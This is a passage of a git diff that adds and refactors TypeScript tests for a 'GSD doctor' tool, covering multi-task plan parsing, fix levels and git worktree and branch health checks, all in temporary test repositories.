+  // ═══════════════════════════════════════════════════════════════════════════
+  // Bug 3: Multi-task plan — T02+ outside ## Tasks section
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  test('Bug 3: parsePlan finds all tasks even when interleaved with detail sections', () => {
+    // Multi-task plan where T02 checkbox appears after T01's ## Steps heading,
+    // which ends the ## Tasks section for extractSection().
+    const planContent = `# S01: Demo Slice
+
+**Goal:** Build the demo
+**Demo:** Run it
+
+## Must-Haves
+- Feature A
+
+## Tasks
+- [x] **T01: First task** \`est:30m\`
+  Implement the first thing.
+## Steps
+1. Step one
+2. Step two
+## Must-Haves
+- Requirement A
+- [x] **T02: Second task** \`est:1h\`
+  Implement the second thing.
+## Steps
+1. Step one
+2. Step two
+`;
+
+    const plan = parsePlan(planContent);
+    const taskIds = plan.tasks.map(t => t.id);
+
+    assert.ok(taskIds.includes("T01"), "should find T01");
+    assert.ok(taskIds.includes("T02"), "should find T02 even when after T01 detail headings");
+    assert.equal(plan.tasks.length, 2, "should find exactly 2 tasks");
+  });
+
+  test('Bug 3: task_file_not_in_plan should not fire for T02 in multi-task plan', async () => {
+    const { base, mDir } = makeBase();
+    writeRoadmap(mDir, `# M001: Multi-Task Test\n\n## Slices\n- [ ] **S01: Slice** \`risk:low\` \`depends:[]\`\n  > After this: done\n`);
+
+    // Plan with interleaved headings (the problematic format)
+    const sDir = writeSlice(mDir, "S01", `# S01: Demo Slice
+
+**Goal:** Build the demo
+**Demo:** Run it
+
+## Must-Haves
+- Feature A
+
+## Tasks
+- [x] **T01: First task** \`est:30m\`
+  Implement the first thing.
+## Steps
+1. Step one
+## Must-Haves
+- Req A
+- [x] **T02: Second task** \`est:1h\`
+  Implement the second thing.
+## Steps
+1. Step one
+`);
+
+    // Both tasks have summaries on disk
+    writeFileSync(join(sDir, "tasks", "T01-SUMMARY.md"), "---\nstatus: done\ncompleted_at: 2026-01-01T00:00:00Z\n---\n# T01\nDone.\n");
+    writeFileSync(join(sDir, "tasks", "T02-SUMMARY.md"), "---\nstatus: done\ncompleted_at: 2026-01-01T00:00:00Z\n---\n# T02\nDone.\n");
+
+    const result = await runGSDDoctor(base, { fix: false });
+
+    // T02 should NOT be flagged as "not in plan"
+    const notInPlan = result.issues.filter(
+      i => i.code === "task_file_not_in_plan" && i.message.includes("T02")
+    );
+    assert.equal(notInPlan.length, 0,
+      "should not report T02 as 'not in plan' when it exists in the interleaved plan format");
+
+    rmSync(base, { recursive: true, force: true });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/integration/doctor-fixlevel.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-fixlevel.test.ts
new file mode 100644
index 000000000..7b43459c6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/doctor-fixlevel.test.ts
@@ -0,0 +1,212 @@
+/**
+ * Tests that doctor's fixLevel option correctly separates task-level
+ * bookkeeping from completion state transitions.
+ *
+ * With reconciliation codes removed (S06), doctor no longer creates
+ * summary stubs, UAT stubs, or flips checkboxes. These tests verify
+ * the fix infrastructure still works for remaining fixable codes
+ * (e.g. delimiter_in_title, missing_tasks_dir) and that removed
+ * reconciliation codes are truly absent.
+ */
+
+import { mkdirSync, writeFileSync, rmSync, readFileSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import test from "node:test";
+import assert from "node:assert/strict";
+import { runGSDDoctor } from "../../doctor.ts";
+import { closeDatabase } from "../../gsd-db.ts";
+
+function makeTmp(name: string): string {
+  const dir = join(tmpdir(), `doctor-fixlevel-${name}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+/**
+ * Build a minimal .gsd structure: milestone with one slice, one task
+ * marked done with a summary — but no slice summary and roadmap unchecked.
+ * Previously this triggered reconciliation; now it should produce no
+ * reconciliation issue codes.
+ */
+function buildScaffold(base: string) {
+  const gsd = join(base, ".gsd");
+  const m = join(gsd, "milestones", "M001");
+  const s = join(m, "slices", "S01", "tasks");
+  mkdirSync(s, { recursive: true });
+
+  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
+
+## Slices
+
+- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
+  > Demo text
+`);
+
+  writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Test Slice
+
+**Goal:** test
+
+## Tasks
+
+- [x] **T01: Do stuff** \`est:5m\`
+`);
+
+  writeFileSync(join(s, "T01-SUMMARY.md"), `---
+id: T01
+parent: S01
+milestone: M001
+duration: 5m
+verification_result: passed
+completed_at: 2026-01-01
+---
+
+# T01: Do stuff
+
+Done.
+`);
+}
+
+const REMOVED_CODES = [
+  "task_done_missing_summary",
+  "task_summary_without_done_checkbox",
+  "all_tasks_done_missing_slice_summary",
+  "all_tasks_done_missing_slice_uat",
+  "all_tasks_done_roadmap_not_checked",
+  "slice_checked_missing_summary",
+  "slice_checked_missing_uat",
+];
+
+test("fixLevel:task — no reconciliation issue codes are reported", async (t) => {
+  const tmp = makeTmp("task-level");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  buildScaffold(tmp);
+
+  const report = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
+
+  const codes = report.issues.map(i => i.code);
+  for (const removed of REMOVED_CODES) {
+    assert.ok(!codes.includes(removed as any), `should NOT report removed code: ${removed}`);
+  }
+});
+
+test("fixLevel:all — no reconciliation issue codes are reported", async (t) => {
+  const tmp = makeTmp("all-level");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  buildScaffold(tmp);
+
+  const report = await runGSDDoctor(tmp, { fix: true });
+
+  const codes = report.issues.map(i => i.code);
+  for (const removed of REMOVED_CODES) {
+    assert.ok(!codes.includes(removed as any), `should NOT report removed code: ${removed}`);
+  }
+
+  // Summary and UAT stubs should NOT be created (no reconciliation)
+  const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
+  assert.ok(!existsSync(sliceSummaryPath), "should NOT have created summary stub");
+
+  // Roadmap should remain unchecked (no reconciliation)
+  const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
+  assert.ok(roadmapContent.includes("- [ ] **S01"), "roadmap should remain unchecked");
+});
+
+test("legacy roadmap fallback: future slices are treated as pending, active slice is not", async (t) => {
+  const tmp = makeTmp("legacy-pending-fallback");
+  t.after(() => {
+    try { closeDatabase(); } catch { /* noop */ }
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  // Force the legacy parser branch.
+  try { closeDatabase(); } catch { /* noop */ }
+
+  const gsd = join(tmp, ".gsd");
+  const m = join(gsd, "milestones", "M001");
+  const s01 = join(m, "slices", "S01", "tasks");
+  mkdirSync(s01, { recursive: true });
+
+  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
+
+## Slices
+
+- [x] **S01: Done Slice** \`risk:low\` \`depends:[]\`
+  > Done
+- [ ] **S02: Active Slice** \`risk:medium\` \`depends:[S01]\`
+  > In progress
+- [ ] **S03: Future Slice** \`risk:low\` \`depends:[S02]\`
+  > Later
+- [ ] **S04: Future Slice Two** \`risk:low\` \`depends:[S03]\`
+  > Later
+`);
+
+  writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Done Slice
+
+**Goal:** done
+
+## Tasks
+
+- [x] **T01: Done task** \`est:5m\`
+`);
+
+  // Active slice exists in state/registry but has no directory yet — this should
+  // still be reported as a real error, while future untouched slices should be skipped.
+  const report = await runGSDDoctor(tmp, { scope: "M001" });
+  const missingSliceDirUnits = report.issues
+    .filter(i => i.code === "missing_slice_dir")
+    .map(i => i.unitId)
+    .sort();
+
+  assert.deepStrictEqual(
+    missingSliceDirUnits,
+    ["M001/S02"],
+    "legacy fallback should only report the active slice, not future unstarted slices",
+  );
+
+  const missingTasksDirUnits = report.issues
+    .filter(i => i.code === "missing_tasks_dir")
+    .map(i => i.unitId)
+    .sort();
+
+  assert.deepStrictEqual(
+    missingTasksDirUnits,
+    [],
+    "future slices without directories should be skipped before missing_tasks_dir checks",
+  );
+});
+
+test("fixLevel:all — delimiter_in_title still fixable", async (t) => {
+  const tmp = makeTmp("delimiter-fix");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const gsd = join(tmp, ".gsd");
+  const m = join(gsd, "milestones", "M001");
+  const s = join(m, "slices", "S01", "tasks");
+  mkdirSync(s, { recursive: true });
+
+  // Roadmap with em dash in milestone title (should still be fixable)
+  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Foundation \u2014 Build Core
+
+## Slices
+
+- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
+  > Demo
+`);
+
+  writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Test Slice
+
+**Goal:** test
+
+## Tasks
+
+- [ ] **T01: Do stuff** \`est:5m\`
+`);
+
+  const report = await runGSDDoctor(tmp, { fix: true });
+
+  // The milestone-level delimiter is auto-fixed, but the report may or may not include it
+  // depending on whether it was fixed successfully. Just verify it ran without crashing.
+  assert.ok(report.issues !== undefined, "doctor produces a report");
+});
diff --git a/src/resources/extensions/gsd/tests/doctor-git.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-git.test.ts
similarity index 60%
rename from src/resources/extensions/gsd/tests/doctor-git.test.ts
rename to src/resources/extensions/gsd/tests/integration/doctor-git.test.ts
index 10e12e4d9..135f3040b 100644
--- a/src/resources/extensions/gsd/tests/doctor-git.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/doctor-git.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 /**
  * doctor-git.test.ts — Integration tests for doctor git health checks.
  *
@@ -13,11 +15,7 @@ import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { execSync } from "node:child_process";
 
-import { runGSDDoctor } from "../doctor.ts";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
-
+import { runGSDDoctor } from "../../doctor.ts";
 function run(cmd: string, cwd: string): string {
   return execSync(cmd, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
 }
@@ -66,11 +64,11 @@ _None_
   return dir;
 }
 
-/** Write a .gsd/preferences.md with the given git isolation mode. */
+/** Write a .gsd/PREFERENCES.md with the given git isolation mode. */
 function writePreferencesFile(dir: string, isolation: "none" | "worktree" | "branch"): void {
   const gsdDir = join(dir, ".gsd");
   mkdirSync(gsdDir, { recursive: true });
-  writeFileSync(join(gsdDir, "preferences.md"), `---\ngit:\n  isolation: "${isolation}"\n---\n`);
+  writeFileSync(join(gsdDir, "PREFERENCES.md"), `---\ngit:\n  isolation: "${isolation}"\n---\n`);
 }
 
 /** Create a repo with an in-progress milestone. */
@@ -114,7 +112,7 @@ _None_
   return dir;
 }
 
-async function main(): Promise<void> {
+describe('doctor-git', async () => {
   const cleanups: string[] = [];
 
   try {
@@ -124,8 +122,7 @@ async function main(): Promise<void> {
     // logic is correct (tested on macOS/Linux) — the test infra doesn't
     // produce matching paths on Windows CI.
     if (process.platform !== "win32") {
-    console.log("\n=== orphaned_auto_worktree ===");
-    {
+    test('orphaned_auto_worktree', async () => {
       const dir = createRepoWithCompletedMilestone();
       cleanups.push(dir);
 
@@ -135,26 +132,74 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir, { isolationMode: "worktree" });
       const orphanIssues = detect.issues.filter(i => i.code === "orphaned_auto_worktree");
-      assertTrue(orphanIssues.length > 0, "detects orphaned worktree");
-      assertEq(orphanIssues[0]?.unitId, "M001", "orphaned worktree unitId is M001");
+      assert.ok(orphanIssues.length > 0, "detects orphaned worktree");
+      assert.deepStrictEqual(orphanIssues[0]?.unitId, "M001", "orphaned worktree unitId is M001");
 
       const fixed = await runGSDDoctor(dir, { fix: true, isolationMode: "worktree" });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("removed orphaned worktree")), "fix removes orphaned worktree");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("removed orphaned worktree")), "fix removes orphaned worktree");
 
       // Verify worktree is gone
       const wtList = run("git worktree list", dir);
-      assertTrue(!wtList.includes("milestone/M001"), "worktree no longer listed after fix");
+      assert.ok(!wtList.includes("milestone/M001"), "worktree no longer listed after fix");
+    });
+    } else {
+    }
+
+    // ─── Test 1b: Orphaned worktree fix when cwd is inside worktree (#1946) ──
+    // Reproduces the deadlock: if process.cwd() is inside the orphaned worktree,
+    // the doctor must chdir out before removing it — not skip the removal.
+    if (process.platform !== "win32") {
+    console.log("\n=== orphaned_auto_worktree (cwd inside worktree) ===");
+    {
+      const dir = createRepoWithCompletedMilestone();
+      cleanups.push(dir);
+
+      // Create worktree with milestone/M001 branch under .gsd/worktrees/
+      mkdirSync(join(dir, ".gsd", "worktrees"), { recursive: true });
+      run("git worktree add -b milestone/M001 .gsd/worktrees/M001", dir);
+
+      const wtPath = realpathSync(join(dir, ".gsd", "worktrees", "M001"));
+
+      // Simulate the deadlock: set cwd inside the orphaned worktree
+      const previousCwd = process.cwd();
+      process.chdir(wtPath);
+      try {
+        const fixed = await runGSDDoctor(dir, { fix: true, isolationMode: "worktree" });
+
+        // The fix must NOT skip removal — it should chdir out and remove
+        assert.ok(
+          !fixed.fixesApplied.some(f => f.includes("skipped removing worktree")),
+          "does NOT skip removal when cwd is inside worktree",
+        );
+        assert.ok(
+          fixed.fixesApplied.some(f => f.includes("removed orphaned worktree")),
+          "removes orphaned worktree even when cwd was inside it",
+        );
+
+        // Verify worktree is gone
+        const wtList = run("git worktree list", dir);
+        assert.ok(!wtList.includes("milestone/M001"), "worktree removed after fix with cwd inside");
+
+        // Verify cwd was moved out (should be basePath, not still inside worktree)
+        const newCwd = process.cwd();
+        assert.ok(
+          !newCwd.startsWith(wtPath),
+          "cwd moved out of worktree after fix",
+        );
+      } finally {
+        // Restore cwd — the worktree dir may be gone, so chdir to previousCwd
+        try { process.chdir(previousCwd); } catch { process.chdir(dir); }
+      }
     }
     } else {
-      console.log("\n=== orphaned_auto_worktree (skipped on Windows) ===");
+      console.log("\n=== orphaned_auto_worktree (cwd inside worktree — skipped on Windows) ===");
     }
 
     // ─── Test 2: Stale milestone branch detection & fix ────────────────
     // Skip on Windows: git branch glob matching and path resolution
     // behave differently in Windows temp dirs.
     if (process.platform !== "win32") {
-    console.log("\n=== stale_milestone_branch ===");
-    {
+    test('stale_milestone_branch', async () => {
       const dir = createRepoWithCompletedMilestone();
       cleanups.push(dir);
 
@@ -163,23 +208,21 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir, { isolationMode: "worktree" });
       const staleIssues = detect.issues.filter(i => i.code === "stale_milestone_branch");
-      assertTrue(staleIssues.length > 0, "detects stale milestone branch");
-      assertEq(staleIssues[0]?.unitId, "M001", "stale branch unitId is M001");
+      assert.ok(staleIssues.length > 0, "detects stale milestone branch");
+      assert.deepStrictEqual(staleIssues[0]?.unitId, "M001", "stale branch unitId is M001");
 
       const fixed = await runGSDDoctor(dir, { fix: true, isolationMode: "worktree" });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("deleted stale branch")), "fix deletes stale branch");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("deleted stale branch")), "fix deletes stale branch");
 
       // Verify branch is gone
       const branches = run("git branch --list milestone/*", dir);
-      assertTrue(!branches.includes("milestone/M001"), "branch gone after fix");
-    }
+      assert.ok(!branches.includes("milestone/M001"), "branch gone after fix");
+    });
     } else {
-      console.log("\n=== stale_milestone_branch (skipped on Windows) ===");
     }
 
     // ─── Test 3: Corrupt merge state detection & fix ───────────────────
-    console.log("\n=== corrupt_merge_state ===");
-    {
+    test('corrupt_merge_state', async () => {
       const dir = createRepoWithCompletedMilestone();
       cleanups.push(dir);
 
@@ -189,18 +232,17 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const mergeIssues = detect.issues.filter(i => i.code === "corrupt_merge_state");
-      assertTrue(mergeIssues.length > 0, "detects corrupt merge state");
+      assert.ok(mergeIssues.length > 0, "detects corrupt merge state");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("cleaned merge state")), "fix cleans merge state");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("cleaned merge state")), "fix cleans merge state");
 
       // Verify MERGE_HEAD is gone
-      assertTrue(!existsSync(join(dir, ".git", "MERGE_HEAD")), "MERGE_HEAD removed after fix");
-    }
+      assert.ok(!existsSync(join(dir, ".git", "MERGE_HEAD")), "MERGE_HEAD removed after fix");
+    });
 
     // ─── Test 4: Tracked runtime files detection & fix ─────────────────
-    console.log("\n=== tracked_runtime_files ===");
-    {
+    test('tracked_runtime_files', async () => {
       const dir = createRepoWithCompletedMilestone();
       cleanups.push(dir);
 
@@ -213,19 +255,18 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const trackedIssues = detect.issues.filter(i => i.code === "tracked_runtime_files");
-      assertTrue(trackedIssues.length > 0, "detects tracked runtime files");
+      assert.ok(trackedIssues.length > 0, "detects tracked runtime files");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("untracked")), "fix untracks runtime files");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("untracked")), "fix untracks runtime files");
 
       // Verify file is no longer tracked
       const tracked = run("git ls-files .gsd/activity/", dir);
-      assertEq(tracked, "", "runtime file untracked after fix");
-    }
+      assert.deepStrictEqual(tracked, "", "runtime file untracked after fix");
+    });
 
     // ─── Test 5: Non-git directory — graceful degradation ──────────────
-    console.log("\n=== non-git directory ===");
-    {
+    test('non-git directory', async () => {
       const dir = realpathSync(mkdtempSync(join(tmpdir(), "doc-git-test-")));
       cleanups.push(dir);
 
@@ -236,15 +277,14 @@ async function main(): Promise<void> {
       const gitIssues = result.issues.filter(i =>
         ["orphaned_auto_worktree", "stale_milestone_branch", "corrupt_merge_state", "tracked_runtime_files"].includes(i.code)
       );
-      assertEq(gitIssues.length, 0, "no git issues in non-git directory");
+      assert.deepStrictEqual(gitIssues.length, 0, "no git issues in non-git directory");
       // Should not throw — reaching here means no crash
-      assertTrue(true, "non-git directory does not crash");
-    }
+      assert.ok(true, "non-git directory does not crash");
+    });
 
     // ─── Test 6: Active worktree NOT flagged (false positive prevention) ─
     if (process.platform !== "win32") {
-    console.log("\n=== active worktree safety ===");
-    {
+    test('active worktree safety', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -254,19 +294,17 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir, { isolationMode: "worktree" });
       const orphanIssues = detect.issues.filter(i => i.code === "orphaned_auto_worktree");
-      assertEq(orphanIssues.length, 0, "active worktree NOT flagged as orphaned");
-    }
+      assert.deepStrictEqual(orphanIssues.length, 0, "active worktree NOT flagged as orphaned");
+    });
     } else {
-      console.log("\n=== active worktree safety (skipped on Windows) ===");
     }
 
     // ─── Test 7: none-mode skips orphaned worktree check ───────────────
     // NOTE: loadEffectiveGSDPreferences() resolves PROJECT_PREFERENCES_PATH
     // at module load time from process.cwd(). We write the prefs file to
-    // the test runner's cwd .gsd/preferences.md and clean up afterwards.
+    // the test runner's cwd .gsd/PREFERENCES.md and clean up afterwards.
     if (process.platform !== "win32") {
-    console.log("\n=== none-mode skips orphaned worktree ===");
-    {
+    test('none-mode skips orphaned worktree', async () => {
       const dir = createRepoWithCompletedMilestone();
       cleanups.push(dir);
 
@@ -276,16 +314,14 @@ async function main(): Promise<void> {
 
       const result = await runGSDDoctor(dir, { isolationMode: "none" });
       const orphanIssues = result.issues.filter(i => i.code === "orphaned_auto_worktree");
-      assertEq(orphanIssues.length, 0, "none-mode: orphaned worktree NOT detected");
-    }
+      assert.deepStrictEqual(orphanIssues.length, 0, "none-mode: orphaned worktree NOT detected");
+    });
     } else {
-      console.log("\n=== none-mode skips orphaned worktree (skipped on Windows) ===");
     }
 
     // ─── Test 8: none-mode skips stale branch check ────────────────────
     if (process.platform !== "win32") {
-    console.log("\n=== none-mode skips stale branch ===");
-    {
+    test('none-mode skips stale branch', async () => {
       const dir = createRepoWithCompletedMilestone();
       cleanups.push(dir);
 
@@ -294,16 +330,14 @@ async function main(): Promise<void> {
 
       const result = await runGSDDoctor(dir, { isolationMode: "none" });
       const staleIssues = result.issues.filter(i => i.code === "stale_milestone_branch");
-      assertEq(staleIssues.length, 0, "none-mode: stale branch NOT detected");
-    }
+      assert.deepStrictEqual(staleIssues.length, 0, "none-mode: stale branch NOT detected");
+    });
     } else {
-      console.log("\n=== none-mode skips stale branch (skipped on Windows) ===");
     }
 
     // ─── Test: Integration branch missing ──────────────────────────────
     if (process.platform !== "win32") {
-    console.log("\n=== integration_branch_missing ===");
-    {
+    test('integration_branch_missing', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -313,22 +347,20 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const missingBranchIssues = detect.issues.filter(i => i.code === "integration_branch_missing");
-      assertTrue(missingBranchIssues.length > 0, "detects missing integration branch");
-      assertTrue(
+      assert.ok(missingBranchIssues.length > 0, "detects missing integration branch");
+      assert.ok(
         missingBranchIssues[0]?.message.includes("feat/does-not-exist"),
         "message includes the missing branch name",
       );
-      assertEq(missingBranchIssues[0]?.fixable, true, "integration_branch_missing is auto-fixable via fallback");
-      assertEq(missingBranchIssues[0]?.severity, "warning", "severity is warning (fallback available)");
-    }
+      assert.deepStrictEqual(missingBranchIssues[0]?.fixable, true, "integration_branch_missing is auto-fixable via fallback");
+      assert.deepStrictEqual(missingBranchIssues[0]?.severity, "warning", "severity is warning (fallback available)");
+    });
     } else {
-      console.log("\n=== integration_branch_missing (skipped on Windows) ===");
     }
 
     // ─── Test: Integration branch present — no false positive ──────────
     if (process.platform !== "win32") {
-    console.log("\n=== integration_branch_missing (no false positive) ===");
-    {
+    test('integration_branch_missing (no false positive)', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -338,15 +370,13 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const missingBranchIssues = detect.issues.filter(i => i.code === "integration_branch_missing");
-      assertEq(missingBranchIssues.length, 0, "existing integration branch NOT flagged");
-    }
+      assert.deepStrictEqual(missingBranchIssues.length, 0, "existing integration branch NOT flagged");
+    });
     } else {
-      console.log("\n=== integration_branch_missing (no false positive — skipped on Windows) ===");
     }
 
     // ─── Test: Orphaned worktree directory ─────────────────────────────
-    console.log("\n=== integration_branch_missing: stale metadata with detected fallback ===");
-    {
+    test('integration_branch_missing: stale metadata with detected fallback', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -355,32 +385,31 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const missingBranchIssues = detect.issues.filter(i => i.code === "integration_branch_missing");
-      assertEq(missingBranchIssues.length, 1, "reports one stale integration branch issue");
-      assertEq(missingBranchIssues[0]?.severity, "warning", "stale metadata is warning when a fallback branch exists");
-      assertEq(missingBranchIssues[0]?.fixable, true, "stale metadata becomes auto-fixable when fallback exists");
-      assertTrue(
+      assert.deepStrictEqual(missingBranchIssues.length, 1, "reports one stale integration branch issue");
+      assert.deepStrictEqual(missingBranchIssues[0]?.severity, "warning", "stale metadata is warning when a fallback branch exists");
+      assert.deepStrictEqual(missingBranchIssues[0]?.fixable, true, "stale metadata becomes auto-fixable when fallback exists");
+      assert.ok(
         missingBranchIssues[0]?.message.includes("feat/does-not-exist") &&
         missingBranchIssues[0]?.message.includes("main"),
         "warning mentions stale recorded branch and detected fallback branch",
       );
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(
+      assert.ok(
         fixed.fixesApplied.some(f => f.includes('updated integration branch for M001 to "main"')),
         "doctor fix rewrites stale integration branch metadata to detected fallback branch",
       );
 
       const repairedMeta = JSON.parse(readFileSync(metaPath, "utf-8"));
-      assertEq(repairedMeta.integrationBranch, "main", "metadata rewritten to detected fallback branch");
-    }
+      assert.deepStrictEqual(repairedMeta.integrationBranch, "main", "metadata rewritten to detected fallback branch");
+    });
 
-    console.log("\n=== integration_branch_missing: stale metadata with configured fallback ===");
-    {
+    test('integration_branch_missing: stale metadata with configured fallback', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
       run("git branch trunk", dir);
-      writeFileSync(join(dir, ".gsd", "preferences.md"), `---\ngit:\n  isolation: "worktree"\n  main_branch: "trunk"\n---\n`);
+      writeFileSync(join(dir, ".gsd", "PREFERENCES.md"), `---\ngit:\n  isolation: "worktree"\n  main_branch: "trunk"\n---\n`);
 
       const metaPath = join(dir, ".gsd", "milestones", "M001", "M001-META.json");
       writeFileSync(metaPath, JSON.stringify({ integrationBranch: "feat/does-not-exist" }, null, 2));
@@ -390,17 +419,17 @@ async function main(): Promise<void> {
       try {
         const detect = await runGSDDoctor(dir);
         const missingBranchIssues = detect.issues.filter(i => i.code === "integration_branch_missing");
-        assertEq(missingBranchIssues.length, 1, "configured fallback still reports one stale integration branch issue");
-        assertEq(missingBranchIssues[0]?.severity, "warning", "configured fallback keeps stale metadata at warning severity");
-        assertEq(missingBranchIssues[0]?.fixable, true, "configured fallback remains auto-fixable");
-        assertTrue(
+        assert.deepStrictEqual(missingBranchIssues.length, 1, "configured fallback still reports one stale integration branch issue");
+        assert.deepStrictEqual(missingBranchIssues[0]?.severity, "warning", "configured fallback keeps stale metadata at warning severity");
+        assert.deepStrictEqual(missingBranchIssues[0]?.fixable, true, "configured fallback remains auto-fixable");
+        assert.ok(
           missingBranchIssues[0]?.message.includes("feat/does-not-exist") &&
           missingBranchIssues[0]?.message.includes("trunk"),
           "warning mentions stale recorded branch and configured fallback branch",
         );
 
         const fixed = await runGSDDoctor(dir, { fix: true });
-        assertTrue(
+        assert.ok(
           fixed.fixesApplied.some(f => f.includes('updated integration branch for M001 to "trunk"')),
           "doctor fix rewrites stale metadata to configured fallback branch",
         );
@@ -409,12 +438,11 @@ async function main(): Promise<void> {
       }
 
       const repairedMeta = JSON.parse(readFileSync(metaPath, "utf-8"));
-      assertEq(repairedMeta.integrationBranch, "trunk", "metadata rewritten to configured fallback branch");
-    }
+      assert.deepStrictEqual(repairedMeta.integrationBranch, "trunk", "metadata rewritten to configured fallback branch");
+    });
 
     if (process.platform !== "win32") {
-    console.log("\n=== worktree_directory_orphaned ===");
-    {
+    test('worktree_directory_orphaned', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -425,28 +453,26 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const orphanDirIssues = detect.issues.filter(i => i.code === "worktree_directory_orphaned");
-      assertTrue(orphanDirIssues.length > 0, "detects orphaned worktree directory");
-      assertTrue(
+      assert.ok(orphanDirIssues.length > 0, "detects orphaned worktree directory");
+      assert.ok(
         orphanDirIssues[0]?.message.includes("orphan-feature"),
         "message includes the orphaned directory name",
       );
-      assertTrue(orphanDirIssues[0]?.fixable === true, "worktree_directory_orphaned is fixable");
+      assert.ok(orphanDirIssues[0]?.fixable === true, "worktree_directory_orphaned is fixable");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(
+      assert.ok(
         fixed.fixesApplied.some(f => f.includes("removed orphaned worktree directory")),
         "fix removes orphaned worktree directory",
       );
-      assertTrue(!existsSync(orphanDir), "orphaned directory removed after fix");
-    }
+      assert.ok(!existsSync(orphanDir), "orphaned directory removed after fix");
+    });
     } else {
-      console.log("\n=== worktree_directory_orphaned (skipped on Windows) ===");
     }
 
     // ─── Test: Registered worktree NOT flagged as orphaned ─────────────
     if (process.platform !== "win32") {
-    console.log("\n=== worktree_directory_orphaned (registered worktree not flagged) ===");
-    {
+    test('worktree_directory_orphaned (registered worktree not flagged)', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -456,15 +482,13 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const orphanDirIssues = detect.issues.filter(i => i.code === "worktree_directory_orphaned");
-      assertEq(orphanDirIssues.length, 0, "registered worktree NOT flagged as orphaned");
-    }
+      assert.deepStrictEqual(orphanDirIssues.length, 0, "registered worktree NOT flagged as orphaned");
+    });
     } else {
-      console.log("\n=== worktree_directory_orphaned (registered worktree not flagged — skipped on Windows) ===");
     }
 
     // ─── Test 9: none-mode still detects corrupt merge state ───────────
-    console.log("\n=== none-mode keeps corrupt merge state ===");
-    {
+    test('none-mode keeps corrupt merge state', async () => {
       const dir = createRepoWithCompletedMilestone();
       cleanups.push(dir);
 
@@ -474,12 +498,11 @@ async function main(): Promise<void> {
 
       const result = await runGSDDoctor(dir, { isolationMode: "none" });
       const mergeIssues = result.issues.filter(i => i.code === "corrupt_merge_state");
-      assertTrue(mergeIssues.length > 0, "none-mode: corrupt merge state IS detected");
-    }
+      assert.ok(mergeIssues.length > 0, "none-mode: corrupt merge state IS detected");
+    });
 
     // ─── Test 10: none-mode still detects tracked runtime files ────────
-    console.log("\n=== none-mode keeps tracked runtime files ===");
-    {
+    test('none-mode keeps tracked runtime files', async () => {
       const dir = createRepoWithCompletedMilestone();
       cleanups.push(dir);
 
@@ -492,13 +515,12 @@ async function main(): Promise<void> {
 
       const result = await runGSDDoctor(dir, { isolationMode: "none" });
       const trackedIssues = result.issues.filter(i => i.code === "tracked_runtime_files");
-      assertTrue(trackedIssues.length > 0, "none-mode: tracked runtime files IS detected");
-    }
+      assert.ok(trackedIssues.length > 0, "none-mode: tracked runtime files IS detected");
+    });
 
     // ─── Test: Symlinked .gsd does not cause false orphan detection ────
